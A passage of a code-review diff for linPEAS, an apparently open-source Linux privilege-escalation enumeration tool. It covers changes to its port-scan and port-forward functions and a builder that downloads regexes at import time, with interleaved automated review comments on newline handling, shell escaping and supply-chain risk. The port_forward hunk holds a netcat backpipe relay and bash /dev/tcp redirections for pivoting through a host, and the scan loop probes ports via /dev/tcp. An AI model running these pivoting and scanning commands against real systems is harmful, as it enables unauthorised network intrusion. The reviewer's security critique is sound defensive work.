8888 8899 8994 9000 9001 9002 9003 9009 9010 9011 9040 9050 9071 9080 9081 9090 9091 9099 9100 9101 9102 9103 9110 9111 9200 9207 9220 9290 9415 9418 9485 9500 9502 
9503 9535 9575 9593 9594 9595 9618 9666 9876 9877 9878 9898 9900 9917 9929 9943 9944 9968 9998 9999 10000 10001 10002 10003 10004 10009 10010 10012 10024 10025 10082 10180 10215 10243 10566 10616 10617 10621 10626 10628 10629 10778 11110 11111 11967 12000 12174 12265 12345 13456 13722 13782 13783 14000 14238 14441 14442 15000 15002 15003 15004 15660 15742 16000 16001 16012 16016 16018 16080 16113 16992 16993 17877 17988 18040 18101 18988 19101 19283 19315 19350 19780 19801 19842 20000 20005 20031 20221 20222 20828 21571 22939 23502 24444 24800 25734 25735 26214 27000 27352 27353 27355 27356 27715 28201 30000 30718 30951 31038 31337 32768 32769 32770 32771 32772 32773 32774 32775 32776 32777 32778 32779 32780 32781 32782 32783 32784 32785 33354 33899 34571 34572 34573 35500 38292 40193 40911 41511 42510 44176 44442 44443 44501 45100 48080 49152 49153 49154 49155 49156 49157 49158 49159 49160 49161 49163 49165 49167 49175 49176 49400 49999 50000 50001 50002 50003 50006 50300 50389 50500 50636 50800 51103 51493 52673 52822 52848 52869 54045 54328 55055 55056 55555 55600 56737 56738 57294 57797 58080 60020 60443 61532 61900 62078 63331 64623 64680 65000 65129 65389 3 4 6 7 9 13 17 19 20 21 22 23 24 25 26 30 32 33 37 42 43 49 53 70 79 80 81 82 83 84 85 88 89 90 99 100 106 109 110 111 113 119 125 135 139 143 144 146 161 163 179 199 211 212 222 254 255 256 259 264 280 301 306 311 340 366 389 406 407 416 417 425 427 443 444 445 458 464 465 481 497 500 512 513 514 515 524 541 543 544 545 548 554 555 563 587 593 616 617 625 631 636 646 648 666 667 668 683 687 691 700 705 711 714 720 722 726 749 765 777 783 787 800 801 808 843 873 880 888 898 900 901 902 903 911 912 981 987 990 992 993 995 999 1000 1001 1002 1007 1009 1010 1011 1021 1022 1023 1024 1025 1026 1027 1028 1029 1030 1031 1032 1033 1034 1035 1036 1037 1038 1039 1040 1041 1042 1043 1044 1045 1046 1047 1048 1049 1050 1051 1052 1053 1054 1055 1056 1057 1058 1059 1060 1061 1062 1063 1064 1065 1066 1067 1068 1069 1070 
1071 1072 1073 1074 1075 1076 1077 1078 1079 1080 1081 1082 1083 1084 1085 1086 1087 1088 1089 1090 1091 1092 1093 1094 1095 1096 1097 1098 1099 1100 1102 1104 1105 1106 1107 1108 1110 1111 1112 1113 1114 1117 1119 1121 1122 1123 1124 1126 1130 1131 1132 1137 1138 1141 1145 1147 1148 1149 1151 1152 1154 1163 1164 1165 1166 1169 1174 1175 1183 1185 1186 1187 1192 1198 1199 1201 1213 1216 1217 1218 1233 1234 1236 1244 1247 1248 1259 1271 1272 1277 1287 1296 1300 1301 1309 1310 1311 1322 1328 1334 1352 1417 1433 1434 1443 1455 1461 1494 1500 1501 1503 1521 1524 1533 1556 1580 1583 1594 1600 1641 1658 1666 1687 1688 1700 1717 1718 1719 1720 1721 1723 1755 1761 1782 1783 1801 1805 1812 1839 1840 1862 1863 1864 1875 1900 1914 1935 1947 1971 1972 1974 1984 1998 1999 2000 2001 2002 2003 2004 2005 2006 2007 2008 2009 2010 2013 2020 2021 2022 2030 2033 2034 2035 2038 2040 2041 2042 2043 2045 2046 2047 2048 2049 2065 2068 2099 2100 2103 2105 2106 2107 2111 2119 2121 2126 2135 2144 2160 2161 2170 2179 2190 2191 2196 2200 2222 2251 2260 2288 2301 2323 2366 2381 2382 2383 2393 2394 2399 2401 2492 2500 2522 2525 2557 2601 2602 2604 2605 2607 2608 2638 2701 2702 2710 2717 2718 2725 2800 2809 2811 2869 2875 2909 2910 2920 2967 2968 2998 3000 3001 3003 3005 3006 3007 3011 3013 3017 3030 3031 3052 3071 3077 3128 3168 3211 3221 3260 3261 3268 3269 3283 3300 3301 3306 3322 3323 3324 3325 3333 3351 3367 3369 3370 3371 3372 3389 3390 3404 3476 3493 3517 3527 3546 3551 3580 3659 3689 3690 3703 3737 3766 3784 3800 3801 3809 3814 3826 3827 3828 3851 3869 3871 3878 3880 3889 3905 3914 3918 3920 3945 3971 3986 3995 3998 4000 4001 4002 4003 4004 4005 4006 4045 4111 4125 4126 4129 4224 4242 4279 4321 4343 4443 4444 4445 4446 4449 4550 4567 4662 4848 4899 4900 4998 5000 5001 5002 5003 5004 5009 5030 5033 5050 5051 5054 5060 5061 5080 5087 5100 5101 5102 5120 5190 5200 5214 5221 5222 5225 5226 5269 5280 5298 5357 5405 5414 5431 5432 5440 5500 5510 5544 5550 5555 5560 5566 5631 5633 5666 5678 5679 
5718 5730 5800 5801 5802 5810 5811 5815 5822 5825 5850 5859 5862 5877 5900 5901 5902 5903 5904 5906 5907 5910 5911 5915 5922 5925 5950 5952 5959 5960 5961 5962 5963 5987 5988 5989 5998 5999 6000 6001 6002 6003 6004 6005 6006 6007 6009 6025 6059 6100 6101 6106 6112 6123 6129 6156 6346 6389 6502 6510 6543 6547 6565 6566 6567 6580 6646 6666 6667 6668 6669 6689 6692 6699 6779 6788 6789 6792 6839 6881 6901 6969 7000 7001 7002 7004 7007 7019 7025 7070 7100 7103 7106 7200 7201 7402 7435 7443 7496 7512 7625 7627 7676 7741 7777 7778 7800 7911 7920 7921 7937 7938 7999 8000 8001 8002 8007 8008 8009 8010 8011 8021 8022 8031 8042 8045 8080 8081 8082 8083 8084 8085 8086 8087 8088 8089 8090 8093 8099 8100 8180 8181 8192 8193 8194 8200 8222 8254 8290 8291 8292 8300 8333 8383 8400 8402 8443 8500 8600 8649 8651 8652 8654 8701 8800 8873 8888 8899 8994 9000 9001 9002 9003 9009 9010 9011 9040 9050 9071 9080 9081 9090 9091 9099 9100 9101 9102 9103 9110 9111 9200 9207 9220 9290 9415 9418 9485 9500 9502 9503 9535 9575 9593 9594 9595 9618 9666 9876 9877 9878 9898 9900 9917 9929 9943 9944 9968 9998 9999 10000 10001 10002 10003 10004 10009 10010 10012 10024 10025 10082 10180 10215 10243 10566 10616 10617 10621 10626 10628 10629 10778 11110 11111 11967 12000 12174 12265 12345 13456 13722 13782 13783 14000 14238 14441 14442 15000 15002 15003 15004 15660 15742 16000 16001 16012 16016 16018 16080 16113 16992 16993 17877 17988 18040 18101 18988 19101 19283 19315 19350 19780 19801 19842 20000 20005 20031 20221 20222 20828 21571 22939 23502 24444 24800 25734 25735 26214 27000 27352 27353 27355 27356 27715 28201 30000 30718 30951 31038 31337 32768 32769 32770 32771 32772 32773 32774 32775 32776 32777 32778 32779 32780 32781 32782 32783 32784 32785 33354 33899 34571 34572 34573 35500 38292 40193 40911 41511 42510 44176 44442 44443 44501 45100 48080 49152 49153 49154 49155 49156 49157 49158 49159 49160 49161 49163 49165 49167 49175 49176 49400 49999 50000 50001 50002 50003 50006 50300 50389 50500 
50636 50800 51103 51493 52673 52822 52848 52869 54045 54328 55055 55056 55555 55600 56737 56738 57294 57797 58080 60020 60443 61532 61900 62078 63331 64623 64680 65000 65129 65389" + PORTS="1 3 4 6 7 9 13 17 19 20 21 22 23 24 25 26 30 32 33 37 42 43 49 53 70 79 80 81 82 83 84 85 88 89 90 99 100 106 109 110 111 113 119 125 135 139 143 144 146 161 163 179 199 211 212 222 254 255 256 259 264 280 301 306 311 340 366 389 406 407 416 417 425 427 443 444 445 458 464 465 481 497 500 512 513 514 515 524 541 543 544 545 548 554 555 563 587 593 616 617 625 631 636 646 648 666 667 668 683 687 691 700 705 711 714 720 722 726 749 765 777 783 787 800 801 808 843 873 880 888 898 900 901 902 903 911 912 981 987 990 992 993 995 999 1000 1001 1002 1007 1009 1010 1011 1021 1022 1023 1024 1025 1026 1027 1028 1029 1030 1031 1032 1033 1034 1035 1036 1037 1038 1039 1040 1041 1042 1043 1044 1045 1046 1047 1048 1049 1050 1051 1052 1053 1054 1055 1056 1057 1058 1059 1060 1061 1062 1063 1064 1065 1066 1067 1068 1069 1070 1071 1072 1073 1074 1075 1076 1077 1078 1079 1080 1081 1082 1083 1084 1085 1086 1087 1088 1089 1090 1091 1092 1093 1094 1095 1096 1097 1098 1099 1100 1102 1104 1105 1106 1107 1108 1110 1111 1112 1113 1114 1117 1119 1121 1122 1123 1124 1126 1130 1131 1132 1137 1138 1141 1145 1147 1148 1149 1151 1152 1154 1163 1164 1165 1166 1169 1174 1175 1183 1185 1186 1187 1192 1198 1199 1201 1213 1216 1217 1218 1233 1234 1236 1244 1247 1248 1259 1271 1272 1277 1287 1296 1300 1301 1309 1310 1311 1322 1328 1334 1352 1417 1433 1434 1443 1455 1461 1494 1500 1501 1503 1521 1524 1533 1556 1580 1583 1594 1600 1641 1658 1666 1687 1688 1700 1717 1718 1719 1720 1721 1723 1755 1761 1782 1783 1801 1805 1812 1839 1840 1862 1863 1864 1875 1900 1914 1935 1947 1971 1972 1974 1984 1998 1999 2000 2001 2002 2003 2004 2005 2006 2007 2008 2009 2010 2013 2020 2021 2022 2030 2033 2034 2035 2038 2040 2041 2042 2043 2045 2046 2047 2048 2049 2065 2068 2099 2100 2103 2105 2106 2107 2111 2119 2121 2126 2135 2144 2160 
2161 2170 2179 2190 2191 2196 2200 2222 2251 2260 2288 2301 2323 2366 2381 2382 2383 2393 2394 2399 2401 2492 2500 2522 2525 2557 2601 2602 2604 2605 2607 2608 2638 2701 2702 2710 2717 2718 2725 2800 2809 2811 2869 2875 2909 2910 2920 2967 2968 2998 3000 3001 3003 3005 3006 3007 3011 3013 3017 3030 3031 3052 3071 3077 3128 3168 3211 3221 3260 3261 3268 3269 3283 3300 3301 3306 3322 3323 3324 3325 3333 3351 3367 3369 3370 3371 3372 3389 3390 3404 3476 3493 3517 3527 3546 3551 3580 3659 3689 3690 3703 3737 3766 3784 3800 3801 3809 3814 3826 3827 3828 3851 3869 3871 3878 3880 3889 3905 3914 3918 3920 3945 3971 3986 3995 3998 4000 4001 4002 4003 4004 4005 4006 4045 4111 4125 4126 4129 4224 4242 4279 4321 4343 4443 4444 4445 4446 4449 4550 4567 4662 4848 4899 4900 4998 5000 5001 5002 5003 5004 5009 5030 5033 5050 5051 5054 5060 5061 5080 5087 5100 5101 5102 5120 5190 5200 5214 5221 5222 5225 5226 5269 5280 5298 5357 5405 5414 5431 5432 5440 5500 5510 5544 5550 5555 5560 5566 5631 5633 5666 5678 5679 5718 5730 5800 5801 5802 5810 5811 5815 5822 5825 5850 5859 5862 5877 5900 5901 5902 5903 5904 5906 5907 5910 5911 5915 5922 5925 5950 5952 5959 5960 5961 5962 5963 5987 5988 5989 5998 5999 6000 6001 6002 6003 6004 6005 6006 6007 6009 6025 6059 6100 6101 6106 6112 6123 6129 6156 6346 6389 6502 6510 6543 6547 6565 6566 6567 6580 6646 6666 6667 6668 6669 6689 6692 6699 6779 6788 6789 6792 6839 6881 6901 6969 7000 7001 7002 7004 7007 7019 7025 7070 7100 7103 7106 7200 7201 7402 7435 7443 7496 7512 7625 7627 7676 7741 7777 7778 7800 7911 7920 7921 7937 7938 7999 8000 8001 8002 8007 8008 8009 8010 8011 8021 8022 8031 8042 8045 8080 8081 8082 8083 8084 8085 8086 8087 8088 8089 8090 8093 8099 8100 8180 8181 8192 8193 8194 8200 8222 8254 8290 8291 8292 8300 8333 8383 8400 8402 8443 8500 8600 8649 8651 8652 8654 8701 8800 8873 8888 8899 8994 9000 9001 9002 9003 9009 9010 9011 9040 9050 9071 9080 9081 9090 9091 9099 9100 9101 9102 9103 9110 9111 9200 9207 9220 9290 9415 9418 9485 9500 
9502 9503 9535 9575 9593 9594 9595 9618 9666 9876 9877 9878 9898 9900 9917 9929 9943 9944 9968 9998 9999 10000 10001 10002 10003 10004 10009 10010 10012 10024 10025 10082 10180 10215 10243 10566 10616 10617 10621 10626 10628 10629 10778 11110 11111 11967 12000 12174 12265 12345 13456 13722 13782 13783 14000 14238 14441 14442 15000 15002 15003 15004 15660 15742 16000 16001 16012 16016 16018 16080 16113 16992 16993 17877 17988 18040 18101 18988 19101 19283 19315 19350 19780 19801 19842 20000 20005 20031 20221 20222 20828 21571 22939 23502 24444 24800 25734 25735 26214 27000 27352 27353 27355 27356 27715 28201 30000 30718 30951 31038 31337 32768 32769 32770 32771 32772 32773 32774 32775 32776 32777 32778 32779 32780 32781 32782 32783 32784 32785 33354 33899 34571 34572 34573 35500 38292 40193 40911 41511 42510 44176 44442 44443 44501 45100 48080 49152 49153 49154 49155 49156 49157 49158 49159 49160 49161 49163 49165 49167 49175 49176 49400 49999 50000 50001 50002 50003 50006 50300 50389 50500 50636 50800 51103 51493 52673 52822 52848 52869 54045 54328 55055 55056 55555 55600 56737 56738 57294 57797 58080 60020 60443 61532 61900 62078 63331 64623 64680 65000 65129 65389" else PORTS="$(echo $PORTS | tr ',' ' ')" printf ${YELLOW}"[+]${BLUE} Ports going to be scanned: $PORTS" $NC | tr '\n' " " @@ -868,7 +873,7 @@ tcp_port_scan (){ for port in $PORTS; do if [ "$FOUND_BASH" ]; then - $FOUND_BASH -c "(echo /dev/null && echo -e \"\n[+] Open port at: $IP:$port\"" & + $FOUND_BASH -c "(echo /dev/null && echo -n \"[+] Open port at: $IP:$port\"" & elif [ "$NC_SCAN" ]; then ($NC_SCAN "$IP" "$port" 2>&1 | grep -iv "Connection refused\|No route\|Version\|bytes\| out" | sed -${E} "s,[0-9\.],${SED_RED},g") & fi 
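Review bot: Changing `echo -e "\n[+] Open port at: ..."` to `echo -n "[+] Open port at: ..."` in the bash branch of tcp_port_scan removes the separator between results: each probe is launched as a background job (the line ends in `&`) and now prints without a newline, so when several ports are open the messages run together on one line, e.g. `[+] Open port at: IP:22[+] Open port at: IP:80`. If the goal was only to drop the leading blank line, `echo \"[+] Open port at: $IP:$port\"` (newline after, not before) keeps one result per line; if the caller is now expected to add separators, a short comment on this line saying so would help the next reader. The nc branch of the same `if` still emits newline-terminated output, so the two paths are currently inconsistent. tcp_port_scan's opening lines are outside this hunk.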
@@ -964,15 +969,14 @@ port_forward (){ REMOTE_IP=$3 REMOTE_PORT=$4 - echo "In your local machine execute:" + echo "In your machine execute:" echo "cd /tmp; rm backpipe; mknod backpipe p;" echo "nc -lvnp $LOCAL_PORT 0backpipe" echo "" - echo "Press any key when you have executed the commands" - read -n 1 + read -p "Press any key when you have executed those commands" useless_var bash -c "exec 3<>/dev/tcp/$REMOTE_IP/$REMOTE_PORT; exec 4<>/dev/tcp/$LOCAL_IP/9009; cat <&3 >&4 & cat <&4 >&3 &" - echo "If not error was indicated, your local port $LOCAL_PORT should be forwarded to $REMOTE_IP:$REMOTE_PORT" + echo "If not error was indicated, your host port $LOCAL_PORT should be forwarded to $REMOTE_IP:$REMOTE_PORT" } diff --git a/linPEAS/builder/src/linpeasBuilder.py b/linPEAS/builder/src/linpeasBuilder.py index 9954731..ab36744 100644 --- a/linPEAS/builder/src/linpeasBuilder.py +++ b/linPEAS/builder/src/linpeasBuilder.py @@ -2,6 +2,7 @@ import re import requests import base64 import os +from pathlib import Path from .peasLoaded import PEASLoaded from .peassRecord import PEASRecord @@ -11,7 +12,6 @@ from .yamlGlobals import ( PEAS_FINDS_MARKUP, PEAS_FINDS_CUSTOM_MARKUP, PEAS_STORAGES_MARKUP, - PEAS_STORAGES_MARKUP, INT_HIDDEN_FILES_MARKUP, ROOT_FOLDER, STORAGE_TEMPLATE, @@ -128,7 +128,6 @@ class LinpeasBuilder: #Check for empty seds assert 'sed -${E} "s,,' not in self.linpeas_sh - def __get_peass_marks(self): return re.findall(r'peass\{[\w\-\._ ]*\}', self.linpeas_sh) @@ -372,7 +371,6 @@ class LinpeasBuilder: return (suidVB, sudoVB, capsVB) def __generate_regexes_search(self) -> str: - paths_to_search = REGEXES_LOADED["paths"] regexes = REGEXES_LOADED["regular_expresions"] regexes_search_section = "" 
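Review bot: The new prompt `read -p "Press any key when you have executed those commands" useless_var` in port_forward waits for a full line, so the user must press Enter, not "any key"; the wording should match, e.g. `read -p "Press Enter when you have executed those commands" useless_var`. POSIX only specifies `read -r`, so `-p` relies on the shell in use (bash, dash and busybox ash all accept it, so this is still an improvement over the removed `read -n 1`, which only bash supports); if strict portability matters, `printf '%s' "Press Enter ..."` followed by `read useless_var` avoids the option entirely. The final message also has a typo: `"If no error was indicated, your host port ..."`. port_forward's signature and its first two assignments are outside this hunk.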
@@ -386,30 +384,17 @@ class LinpeasBuilder: caseinsensitive = entry.get("caseinsensitive", False) regex = entry["regex"] regex = regex.replace('"', '\\"').strip() - extra_grep = entry.get("extra_grep") - extra_grep = f"| grep {extra_grep}" if extra_grep else "" - - regexes_search_section += f'print_3title_no_nl "Searching {name} (limited to 50)..."\n' + falsePositives = entry.get("falsePositives", False) - # If custom folder to search in - regexes_search_section += 'if [ "$SEARCH_IN_FOLDER" ]; then\n' - regexes_search_section += " timeout 120 find \"$ROOT_FOLDER\" -type f -not -path \"*/node_modules/*\" -exec grep -HnRiIE \""+regex+"\" '{}' \; 2>/dev/null "+extra_grep+" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &\n" + if falsePositives: + continue - # If search in all the file system - regexes_search_section += 'else\n' - for path in paths_to_search: - grep_flags = "-HnRiIE" if caseinsensitive else "-HnRIE" - regexes_search_section += " timeout 120 find "+path+" -type f -not -path \"*/node_modules/*\" -exec grep "+grep_flags+" \""+regex+"\" '{}' \; 2>/dev/null "+extra_grep+" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &\n" - regexes_search_section += 'fi\n' + regexes_search_section += f" search_for_regex \"{name}\" \"{regex}\" {'1' if caseinsensitive else ''}\n" - regexes_search_section += "wait\n" - - regexes_search_section += "echo ''\n" + regexes_search_section += " echo ''\n\n" return regexes_search_section - - def __replace_mark(self, mark: str, find_calls: list, join_char: str): """Substitude the markup with the actual code""" diff --git a/linPEAS/builder/src/yamlGlobals.py b/linPEAS/builder/src/yamlGlobals.py index bf47f6a..713c318 100644 --- a/linPEAS/builder/src/yamlGlobals.py +++ b/linPEAS/builder/src/yamlGlobals.py 
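Review bot: In the new `search_for_regex \"{name}\" \"{regex}\" ...` line, `name` is interpolated into a double-quoted shell argument with no escaping, and `regex` (escaped on the context line above) only has `"` handled: `$`, backtick and a trailing backslash keep their shell meaning inside double quotes, so a pattern containing `$(...)` or backticks would be expanded when the generated linpeas.sh runs. Because the regex YAML is now fetched from an external repository at build time (see the yamlGlobals.py hunk below), the generated script is only as trustworthy as that file, so the escaping is worth tightening here: `shell_safe = lambda s: s.replace('\\', '\\\\').replace('"', '\\"').replace('$', '\\$').replace('`', '\\`')` applied to both `name` and `regex` before the f-string (and the existing `"`-only replace for `regex` dropped). Passing `''` as the third argument when `caseinsensitive` is false collapses to no argument, which works for a shell function that tests `[ "$3" ]`, but search_for_regex is presumably defined in a linpeas part not in this diff — worth confirming. The enclosing loop over entries starts outside the hunk.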
@@ -1,5 +1,26 @@ import os import yaml +import requests +from pathlib import Path + + +def download_regexes(): + print("[+] Downloading regexes...") + url = "https://raw.githubusercontent.com/JaimePolop/RExpository/main/regex.yaml" + response = requests.get(url) + if response.status_code == 200: + # Save the content of the response to a file + script_folder = Path(os.path.dirname(os.path.abspath(__file__))) + target_file = script_folder / '..' / '..' / '..' / 'build_lists' / 'regexes.yaml' + + with open(target_file, "w") as file: + file.write(response.text) + print(f"Downloaded and saved in '{target_file}' successfully!") + else: + print("Error: Unable to download the regexes file.") + exit(1) + +download_regexes() CURRENT_DIR = os.path.dirname(os.path.realpath(__file__)) @@ -41,14 +62,19 @@ LINPEAS_PARTS = [ "file_path": LINPEAS_BASE_PARTS + "/7_software_information.sh" }, { - "name": "Interesting Files", + "name": "Files with Interesting Permissions", + "name_check": "interesting_perms_files", + "file_path": LINPEAS_BASE_PARTS + "/8_interesting_perms_files.sh" + }, + { + "name": "Other Interesting Files", "name_check": "interesting_files", - "file_path": LINPEAS_BASE_PARTS + "/8_interesting_files.sh" + "file_path": LINPEAS_BASE_PARTS + "/9_interesting_files.sh" }, { "name": "API Keys Regex", "name_check": "api_keys_regex", - "file_path": LINPEAS_BASE_PARTS + "/9_api_keys_regex.sh" + "file_path": LINPEAS_BASE_PARTS + "/10_api_keys_regex.sh" } ]
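Review bot: `download_regexes()` is executed at module import time and fetches `regex.yaml` from the `main` branch of a third-party repository with no pinning, integrity check or timeout, then overwrites `build_lists/regexes.yaml` and calls `exit(1)` on failure. Every linpeas.sh build (including the CI runs this commit adds) therefore embeds whatever that URL serves at build time, a software-supply-chain exposure: an upstream edit or a compromised account flows directly into the regexes spliced into the generated shell script. Suggested changes: pin the URL to a commit SHA and compare the body's SHA-256 against a digest recorded in this repository (`hashlib` is stdlib), pass `timeout=` to `requests.get`, write with an explicit encoding, and move the call out of import time (e.g. invoked explicitly by the builder entry point) so importing yamlGlobals has no network side effect and cannot terminate the process. Falling back to the committed `regexes.yaml` instead of `exit(1)` would also keep offline builds working.
```python
REGEXES_URL = "https://raw.githubusercontent.com/JaimePolop/RExpository/main/regex.yaml"  # TODO: replace 'main' with a pinned commit SHA
REGEXES_SHA256 = "<sha256-of-the-pinned-regex.yaml>"  # placeholder: record the digest of the pinned file


def download_regexes():
    print("[+] Downloading regexes...")
    response = requests.get(REGEXES_URL, timeout=30)
    response.raise_for_status()
    digest = hashlib.sha256(response.content).hexdigest()
    if digest != REGEXES_SHA256:
        raise RuntimeError(f"regexes.yaml digest mismatch: got {digest}")
    script_folder = Path(os.path.dirname(os.path.abspath(__file__)))
    target_file = script_folder / '..' / '..' / '..' / 'build_lists' / 'regexes.yaml'
    target_file.write_text(response.text, encoding="utf-8")
    print(f"Downloaded and saved in '{target_file}' successfully!")

# … unchanged: CURRENT_DIR and the rest of the module; the module-level download_regexes() call is removed and made explicit in the builder entry point …
```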